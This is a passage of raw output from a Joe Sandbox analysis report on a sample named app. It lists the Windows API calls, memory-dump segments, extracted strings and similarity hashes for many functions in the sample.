                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDevice$Mode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 696222070-0
                                                                                                                                              • Opcode ID: 0b9c2ff3e9452577eaa4e4a24d119cdaa1b7e241cf6bc29e48a8d0425e4ee19a
                                                                                                                                              • Instruction ID: b40078db713edfd21a9873406d00821ab7b1675308a8c764c818c18d3d9003fc
                                                                                                                                              • Opcode Fuzzy Hash: 0b9c2ff3e9452577eaa4e4a24d119cdaa1b7e241cf6bc29e48a8d0425e4ee19a
                                                                                                                                              • Instruction Fuzzy Hash: 79110E35700610AFDB21AF15DC44C1EBBFAEF89710B91442AF98697320CB75EC02DB88
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,77D5FBD0,0041821A,004187D7,76170A60,?,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764), ref: 00419CF1
                                                                                                                                              • TlsGetValue.KERNEL32(?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419CFF
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419D55
                                                                                                                                                • Part of subcall function 0041D4E0: HeapAlloc.KERNEL32(00000008,?,0043B1F8,00000010,00419D17,00000001,00000088,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C), ref: 0041D562
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419D26
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00419D3E
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2020098873-0
                                                                                                                                              • Opcode ID: c0dde2ab6abc5d13967d72fca5861c1375e6e24a54f52db835ed15053f81b895
                                                                                                                                              • Instruction ID: 9c9c253482250aba246a1314c7731adacca6fb7c4ca25a5bf85d0a0605742cb6
                                                                                                                                              • Opcode Fuzzy Hash: c0dde2ab6abc5d13967d72fca5861c1375e6e24a54f52db835ed15053f81b895
                                                                                                                                              • Instruction Fuzzy Hash: 0FF0C271701B119FE7301BA0FC097967BB0EF02B65B90463AE941DA2A0CBB88C458798
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • TlsFree.KERNEL32(00595A18,?,?,0042BC00,00000000,00000001), ref: 0042BBAF
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042BBBD
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0042BC00,00000000,00000001), ref: 0042BBC6
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0042BBCD
                                                                                                                                              • DeleteCriticalSection.KERNEL32(0044AEBC,?,?,0042BC00,00000000,00000001), ref: 0042BBD7
                                                                                                                                                • Part of subcall function 0042B9F1: EnterCriticalSection.KERNEL32(?), ref: 0042BA4E
                                                                                                                                                • Part of subcall function 0042B9F1: LeaveCriticalSection.KERNEL32(?,?), ref: 0042BA5E
                                                                                                                                                • Part of subcall function 0042B9F1: LocalFree.KERNEL32(?), ref: 0042BA67
                                                                                                                                                • Part of subcall function 0042B9F1: TlsSetValue.KERNEL32(?,00000000), ref: 0042BA79
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1549993015-0
                                                                                                                                              • Opcode ID: 42da1f527a2b0c3e69970945b8ac3fb8113e542abeed7d7280077cbdc7271ade
                                                                                                                                              • Instruction ID: c978259d00606411c06b9666accebdfa32c1b0646b29e90d722105786fdf7326
                                                                                                                                              • Opcode Fuzzy Hash: 42da1f527a2b0c3e69970945b8ac3fb8113e542abeed7d7280077cbdc7271ade
                                                                                                                                              • Instruction Fuzzy Hash: 72F090313006209BC6319B28FC08E6B37B9DF847253D50639F915D3655D728EC0686AC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 004131DF
                                                                                                                                              • CoTaskMemFree.OLE32(?,?,00000000), ref: 004133C4
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Task$AllocFree
                                                                                                                                              • String ID: $(
                                                                                                                                              • API String ID: 3007142545-55695022
                                                                                                                                              • Opcode ID: a16237aa7a8ee13bba94a7bacb18d3f117483b94c8521d500b5fd6c296647487
                                                                                                                                              • Instruction ID: 7e24ac4c9d61eba3cdab13b1e29302fb200f62294913ba54403eba2bb913f085
                                                                                                                                              • Opcode Fuzzy Hash: a16237aa7a8ee13bba94a7bacb18d3f117483b94c8521d500b5fd6c296647487
                                                                                                                                              • Instruction Fuzzy Hash: 7BB14D70A003099FCB14DFA9C884AAEB7F5FF88704F24495EE416EB351DB74A985CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 0040410A
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00404141
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: (1D$.dll
                                                                                                                                              • API String ID: 1366549216-1666350075
                                                                                                                                              • Opcode ID: 5e346a47d57f0f3e063833318336f299f633875872b39283794376379ce5ba2e
                                                                                                                                              • Instruction ID: 03a9ba815adcd8ec93f3d37bde2f3f8c5eec0943ace6b228f8ee0bf5dcf52d0d
                                                                                                                                              • Opcode Fuzzy Hash: 5e346a47d57f0f3e063833318336f299f633875872b39283794376379ce5ba2e
                                                                                                                                              • Instruction Fuzzy Hash: EB31A171904249AEDB01EFA1CD46EEEBB78AF24308F10007EF155B21D2DB785B48CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetMenuCheckMarkDimensions.USER32 ref: 0042A849
                                                                                                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042A8EB
                                                                                                                                              • LoadBitmapA.USER32(00000000,00007FE3), ref: 0042A903
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2596413745-3916222277
                                                                                                                                              • Opcode ID: 99db48da26093b3bdc554be9bc4593ed5dd0760363e891f11716091b9abc253a
                                                                                                                                              • Instruction ID: 45e3c292e12f698ac8c395a513a2079db83a3a86b63308657ad0fa06f736e0d9
                                                                                                                                              • Opcode Fuzzy Hash: 99db48da26093b3bdc554be9bc4593ed5dd0760363e891f11716091b9abc253a
                                                                                                                                              • Instruction Fuzzy Hash: 9421E172A403188FEB20DF78EC88AAE7BA9EF44304F540526FD15CB292D674D446CB80
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                                • Part of subcall function 00401F77: InterlockedDecrement.KERNEL32(?), ref: 00401F8B
                                                                                                                                              Strings
                                                                                                                                              • 7096E8DFB9895410E31C2B9366BC3029, xrefs: 00402C91
                                                                                                                                              • F7046D1D86401363B3A65AD1DF955C613B5580562C80305B0E0429C491B9426B72F255A74DBED86AE98221EB993227B1317D2C85EE62773CE31C2B9366BC3029, xrefs: 00402CB2
                                                                                                                                              • 20000921, xrefs: 00402CC2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementInterlockedMessagelstrlen
                                                                                                                                              • String ID: 20000921$7096E8DFB9895410E31C2B9366BC3029$F7046D1D86401363B3A65AD1DF955C613B5580562C80305B0E0429C491B9426B72F255A74DBED86AE98221EB993227B1317D2C85EE62773CE31C2B9366BC3029
                                                                                                                                              • API String ID: 4194868412-3646279038
                                                                                                                                              • Opcode ID: f1907d0cb0e8ebf3db968acc4532da3dd8ba0aae87a28045fc38d5a49be86aa8
                                                                                                                                              • Instruction ID: be63b5ce1a2537a5fc28513cc38743cb582c7cc1474271a0e0f7679b016a2b72
                                                                                                                                              • Opcode Fuzzy Hash: f1907d0cb0e8ebf3db968acc4532da3dd8ba0aae87a28045fc38d5a49be86aa8
                                                                                                                                              • Instruction Fuzzy Hash: 51219231E4022976DB157BE29D47EEF7A3CBF4574CF40012AB110710E2CABD8511C6A9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,00000000), ref: 025BF223
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,?), ref: 025BF232
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll), ref: 025BF705
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 025BF715
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$AddressHandleModuleProc
                                                                                                                                              • String ID: NtWaitForKeyedEvent$ntdll
                                                                                                                                              • API String ID: 2009576768-2815205136
                                                                                                                                              • Opcode ID: 614740eaa5f97dce968e9b2229de745b3d622aa6552a4234da5c854249a0c769
                                                                                                                                              • Instruction ID: c440bc861fae6d4ccacab1a23054c9eeee730a81c33430e7945c5e284ad565bc
                                                                                                                                              • Opcode Fuzzy Hash: 614740eaa5f97dce968e9b2229de745b3d622aa6552a4234da5c854249a0c769
                                                                                                                                              • Instruction Fuzzy Hash: 760116B0648302ABE314CF25D94475BBBE9BF94748F108C1DF889D6680E778D548CFAA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0043B298,00000010,00418723,00000000,00000FA0,76170A60,00000000,00419D65,00415EBE,?,0043A478,00000060), ref: 0041E405
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0041E415
                                                                                                                                              Strings
                                                                                                                                              • kernel32.dll, xrefs: 0041E400
                                                                                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0041E40F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                                              • API String ID: 1646373207-3733552308
                                                                                                                                              • Opcode ID: 5c0e4825627cfcbdc909d80ba72f3c4140fdd93ae8b2e26b687a80bbd9fc07fd
                                                                                                                                              • Instruction ID: 02de6b7c6dcb1b4e2d62259ca00e2439f61271760f3b7c106522406a4349fe20
                                                                                                                                              • Opcode Fuzzy Hash: 5c0e4825627cfcbdc909d80ba72f3c4140fdd93ae8b2e26b687a80bbd9fc07fd
                                                                                                                                              • Instruction Fuzzy Hash: 5FF0903C640206EBDB208F66AC0978E37B0FB09788F60417BA824D52A1D738D581DB5C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,004170FA), ref: 0041C5DF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0041C5EF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                              • Opcode ID: c5423254268babc4adbeec866d4f3c3d1c9d9504704e86636f1309afa355d0fc
                                                                                                                                              • Instruction ID: b5510b1185d0b5d4b1d73177c6ffc23074c4178150c12f31e18a4bcac3e4c917
                                                                                                                                              • Opcode Fuzzy Hash: c5423254268babc4adbeec866d4f3c3d1c9d9504704e86636f1309afa355d0fc
                                                                                                                                              • Instruction Fuzzy Hash: 48C012703C0712B6DA281BB11C8AB6B226AAB48F02F9014B66622E1180CF99E149A03D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 0042D00A
                                                                                                                                              • VariantClear.OLEAUT32(0000000C), ref: 0042D122
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariantlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3817854518-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(-0000003C,?,00000000,-0000003C,00000000,0043A978,?,?,?,?,?,0043A478,00000060), ref: 0041B74E
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0043A478,00000060), ref: 0041B758
                                                                                                                                              • ReadFile.KERNEL32(-00000031,-00000031,00000001,-0000003C,00000000,?,?,?,0043A478,00000060), ref: 0041B818
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0043A478,00000060), ref: 0041B822
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004134D3
                                                                                                                                              • GetDesktopWindow.USER32 ref: 004134E6
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004134F9
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00413506
                                                                                                                                                • Part of subcall function 004266AC: MoveWindow.USER32(?,?,?,00000000,?,?,?,00413647,?,?,?,?,00000000), ref: 004266C8
                                                                                                                                                • Part of subcall function 004266EA: ShowWindow.USER32(?,?,00413650,00000000,?,?,?,?,00000000), ref: 004266F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3835705305-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,00419F5B,00000000,?,?,00000001), ref: 0041BB86
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,00000138,?,?), ref: 0040EC54
                                                                                                                                              • GetBkColor.GDI32(?), ref: 0040EC5D
                                                                                                                                              • GetTextColor.GDI32(?), ref: 0040EC69
                                                                                                                                              • GetThreadLocale.KERNEL32(0000F1C0), ref: 0040ECFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
